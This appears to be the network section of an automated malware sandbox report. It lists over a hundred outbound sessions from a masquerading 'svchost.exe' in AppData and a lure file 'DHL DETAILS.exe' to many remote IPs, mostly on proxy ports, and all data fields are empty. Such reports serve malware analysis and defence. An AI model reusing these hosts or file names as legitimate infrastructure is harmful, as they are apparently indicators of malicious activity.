Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7624	192.168.2.5	56743	46.229.253.67	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7625	192.168.2.5	61202	103.60.138.2	4153	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7626	192.168.2.5	64978	164.92.86.113	54093	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7627	192.168.2.5	65289	51.222.241.157	46286	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7628	192.168.2.5	64886	51.158.108.165	16379	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7629	192.168.2.5	57077	138.0.143.128	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7630	192.168.2.5	61212	43.155.170.35	15673	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7631	192.168.2.5	61217	185.38.111.1	8080	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7632	192.168.2.5	61298	104.22.37.236	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7633	192.168.2.5	61243	94.130.94.45	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7634	192.168.2.5	65014	168.205.100.36	8080	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7635	192.168.2.5	61262	138.2.73.157	1080	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7636	192.168.2.5	61221	43.231.22.228	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7637	192.168.2.5	61287	45.11.95.165	6002	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7638	192.168.2.5	60525	206.81.14.168	31966	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7639	192.168.2.5	60025	198.12.255.193	32216	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7640	192.168.2.5	59996	92.204.134.38	51123	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7641	192.168.2.5	61355	104.19.217.219	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7642	192.168.2.5	61363	104.27.66.31	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7643	192.168.2.5	61364	172.67.182.38	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7644	192.168.2.5	61410	104.20.205.191	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7645	192.168.2.5	61417	172.64.86.217	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7646	192.168.2.5	60272	203.57.51.53	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7647	192.168.2.5	57950	159.223.71.71	59243	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7648	192.168.2.5	61214	180.250.159.49	4153	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7649	192.168.2.5	65401	45.11.95.165	5018	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7650	192.168.2.5	57930	98.181.137.80	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7651	192.168.2.5	61332	161.97.163.52	32092	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7652	192.168.2.5	61350	148.72.215.79	48623	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7653	192.168.2.5	61380	62.33.207.202	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7654	192.168.2.5	58170	200.108.190.99	9800	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7655	192.168.2.5	61341	51.161.131.84	58612	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7656	192.168.2.5	60415	172.214.74.105	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7657	192.168.2.5	60704	200.6.175.10	59341	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7658	192.168.2.5	58913	51.77.222.4	8118	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7659	192.168.2.5	58644	152.67.10.190	8100	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7660	192.168.2.5	60395	185.51.92.108	51327	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7661	192.168.2.5	61447	45.61.188.134	44499	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7662	192.168.2.5	61458	162.240.231.211	35541	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7663	192.168.2.5	61469	172.67.182.153	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7664	192.168.2.5	61478	104.19.235.10	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7665	192.168.2.5	61575	45.12.31.104	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7666	192.168.2.5	61699	104.23.100.73	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7667	192.168.2.5	61419	45.5.118.43	999	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7668	192.168.2.5	61028	184.178.172.26	4145	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7669	192.168.2.5	60611	202.136.89.227	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7670	192.168.2.5	61825	162.241.6.97	45629	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7671	192.168.2.5	61491	62.40.157.231	32650	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7672	192.168.2.5	59888	148.72.23.56	39396	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7673	192.168.2.5	62446	199.102.105.242	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7674	192.168.2.5	62084	199.58.184.97	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7675	192.168.2.5	62640	104.27.26.29	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7676	192.168.2.5	62462	192.252.208.70	14282	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7677	192.168.2.5	62558	98.178.72.21	10919	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7678	192.168.2.5	62668	172.93.213.177	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7679	192.168.2.5	62251	120.37.121.209	9091	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7680	192.168.2.5	61229	185.217.136.67	1337	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7681	192.168.2.5	62680	5.252.23.220	1081	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7682	192.168.2.5	62831	43.152.192.217	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7683	192.168.2.5	61806	54.39.50.68	8216	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7684	192.168.2.5	62702	106.105.218.244	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7685	192.168.2.5	63027	43.152.192.217	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7686	192.168.2.5	63040	43.152.192.217	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7687	192.168.2.5	63057	43.152.192.217	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7688	192.168.2.5	62006	45.117.179.179	27836	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7689	192.168.2.5	61396	80.249.112.162	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7690	192.168.2.5	62196	162.214.165.6	42624	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7691	192.168.2.5	62864	203.222.24.36	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7692	192.168.2.5	62845	1.15.62.12	5678	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7693	192.168.2.5	62868	114.156.77.107	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7694	192.168.2.5	63227	172.67.181.37	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7695	192.168.2.5	62903	200.10.73.210	5678	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7696	192.168.2.5	63164	172.93.213.177	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7697	192.168.2.5	62901	43.155.170.35	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7698	192.168.2.5	62287	162.241.46.40	41442	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7699	192.168.2.5	63574	199.102.105.242	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7700	192.168.2.5	63477	38.162.8.226	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7701	192.168.2.5	63217	181.204.184.122	999	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7702	192.168.2.5	63608	191.102.160.157	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7703	192.168.2.5	63131	138.2.73.157	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7704	192.168.2.5	63515	37.235.53.208	6789	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7705	192.168.2.5	63715	199.58.184.97	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7706	192.168.2.5	63828	98.178.72.21	10919	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7707	192.168.2.5	63576	45.11.95.165	6002	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7708	192.168.2.5	63613	5.252.23.220	1081	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7709	192.168.2.5	62588	132.148.244.30	34760	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7710	192.168.2.5	63765	61.178.152.31	7302	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7711	192.168.2.5	64225	199.102.105.242	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7712	192.168.2.5	64127	172.93.213.177	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7713	192.168.2.5	61805	107.148.201.157	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7714	192.168.2.5	62884	64.227.108.25	31908	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7715	192.168.2.5	64004	106.105.218.244	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7716	192.168.2.5	64453	104.19.124.112	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7717	192.168.2.5	64535	172.64.152.98	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7718	192.168.2.5	64254	200.10.73.210	5678	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7719	192.168.2.5	62458	194.233.78.142	41119	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7720	192.168.2.5	64271	43.155.170.35	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7721	192.168.2.5	62669	54.222.197.147	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7722	192.168.2.5	64448	199.58.184.97	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7723	192.168.2.5	64447	203.222.24.36	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7724	192.168.2.5	64696	181.78.11.218	999	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7725	192.168.2.5	62258	223.112.53.2	1025	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7726	192.168.2.5	65101	104.24.15.158	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7727	192.168.2.5	62906	98.181.137.80	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7728	192.168.2.5	64866	5.252.23.220	1081	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7729	192.168.2.5	65047	37.235.53.208	6789	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7730	192.168.2.5	62842	195.114.209.50	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7731	192.168.2.5	51369	162.214.163.137	7484	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7732	192.168.2.5	65241	61.178.152.31	7302	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7733	192.168.2.5	51257	161.35.83.251	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7734	192.168.2.5	51465	220.118.191.238	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7735	192.168.2.5	52514	162.243.55.12	50941	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7736	192.168.2.5	65417	162.159.242.104	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7737	192.168.2.5	62691	74.119.144.60	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7738	192.168.2.5	65305	200.10.73.210	5678	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7739	192.168.2.5	63034	42.49.148.167	9001	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7740	192.168.2.5	49202	219.71.216.78	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7741	192.168.2.5	49597	104.20.34.100	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7742	192.168.2.5	65308	106.105.218.244	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7743	192.168.2.5	49428	203.222.24.36	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7744	192.168.2.5	54668	104.19.5.247	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7745	192.168.2.5	51024	1.15.62.12	5678	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7746	192.168.2.5	55230	166.62.85.184	21946	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7747	192.168.2.5	56100	104.20.235.179	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7748	192.168.2.5	57092	199.102.106.94	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7749	192.168.2.5	58771	104.200.135.46	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7750	192.168.2.5	51283	37.235.53.208	6789	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7751	192.168.2.5	59643	104.16.107.142	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7752	192.168.2.5	64228	5.252.23.249	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7753	192.168.2.5	60989	104.27.12.22	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7754	192.168.2.5	55422	54.36.122.16	44587	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7755	192.168.2.5	54210	213.184.153.66	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7756	192.168.2.5	56031	74.119.144.60	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7757	192.168.2.5	52975	45.231.133.51	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7758	192.168.2.5	61051	172.67.182.90	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7759	192.168.2.5	61416	167.99.124.118	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7760	192.168.2.5	64939	140.238.25.255	21000	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7761	192.168.2.5	60994	185.212.60.62	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7762	192.168.2.5	61026	65.109.152.88	8888	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7763	192.168.2.5	63613	104.20.75.69	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7764	192.168.2.5	64447	172.67.127.188	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7765	192.168.2.5	65398	199.58.184.97	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

